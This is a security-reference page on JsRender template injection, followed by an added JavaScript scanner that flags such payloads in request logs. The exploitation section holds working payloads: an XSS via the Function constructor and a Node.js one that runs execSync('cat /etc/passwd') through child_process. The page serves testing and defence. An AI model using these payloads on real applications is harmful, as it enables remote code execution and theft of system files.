JsRender Template Injection

Last modified: 2023-03-26

JsRender is a lightweight but powerful template engine. When user-controlled input is compiled as part of a template (rather than passed to a fixed template as data), it is vulnerable to template injection.

Investigation

Try to insert arbitrary code inside double curly braces. If the evaluated result of the code is reflected in the page, user input is being compiled as a template and we can inject malicious code into it.

{{:2*3}}
{{:"test".toString}}

Exploitation

# XSS
{{:"test".toString.constructor.call({},"alert(1)")}}
# Read local files
{{:"test".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}
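As a defensive counterpart to the probes and payloads above, here is an added example (not part of the original page) that flags these patterns in HTTP request logs; the log lines are constructed and the log layout (method, URL, status) is an assumption.

```javascript
// Added example, not from the original page: flag JsRender template-injection
// probes and payloads in HTTP request logs. The log lines are constructed and
// the log layout (method, URL, status) is an assumption.

// One detector per stage of the attack chain described on the page.
const INDICATORS = [
  { name: "arithmetic-probe",     re: /^\s*\d+\s*[-+*\/]\s*\d+\s*$/,               weight: 1 },
  { name: "property-walk",        re: /\.(toString|constructor)\b/,                 weight: 2 },
  { name: "function-constructor", re: /constructor\s*\.\s*call\s*\(/,               weight: 4 },
  { name: "node-internals",       re: /process\.mainModule|child_process|execSync/, weight: 5 },
  { name: "dom-script",           re: /\balert\s*\(|document\./,                    weight: 3 },
];

// URL-decode the line and return the body of every {{...}} tag, with the
// leading ':' or '>' tag marker removed. Non-greedy so an object literal such
// as call({}, ...) inside the tag does not end the match early.
function extractTagBodies(line) {
  let decoded = line;
  try { decoded = decodeURIComponent(line.replace(/\+/g, " ")); } catch (_) { /* keep raw */ }
  return [...decoded.matchAll(/\{\{([\s\S]*?)\}\}/g)].map(m => m[1].replace(/^[:>]/, ""));
}

function scoreTagBody(body) {
  const hits = INDICATORS.filter(ind => ind.re.test(body));
  return { body, hits: hits.map(h => h.name), score: hits.reduce((s, h) => s + h.weight, 0) };
}

// Findings for one log line, or null when every tag is a plain data reference
// such as {{:name}} (score 0).
function scanLogLine(line) {
  const findings = extractTagBodies(line).map(scoreTagBody).filter(f => f.score > 0);
  if (findings.length === 0) return null;
  const top = Math.max(...findings.map(f => f.score));
  return { line, severity: top >= 4 ? "critical" : "suspicious", findings };
}

function scanLog(lines) { return lines.map(scanLogLine).filter(Boolean); }

// Constructed sample log: a benign request, a plain data reference, the
// page's arithmetic probe, and two code-execution payload shapes.
const SAMPLE_LOG = [
  "GET /greet?name=Alice HTTP/1.1 200",
  "GET /greet?name=%7B%7B%3Aname%7D%7D HTTP/1.1 200",
  "GET /greet?name=%7B%7B%3A2*3%7D%7D HTTP/1.1 200",
  "GET /greet?name=%7B%7B%3A%22x%22.toString.constructor.call(%7B%7D%2C%22alert(1)%22)%7D%7D HTTP/1.1 200",
  "POST /render tpl=%7B%7B%3A%22x%22.toString.constructor.call(%7B%7D%2C%22return%20process.mainModule.constructor._load(%27child_process%27)%22)()%7D%7D HTTP/1.1 500",
];

for (const r of scanLog(SAMPLE_LOG)) {
  console.log(r.severity, r.findings.map(f => f.hits.join("+")).join(" | "));
}
```

A plain `{{:name}}` in a request is not flagged on its own, so tune the indicator list to your application before alerting on "suspicious" hits.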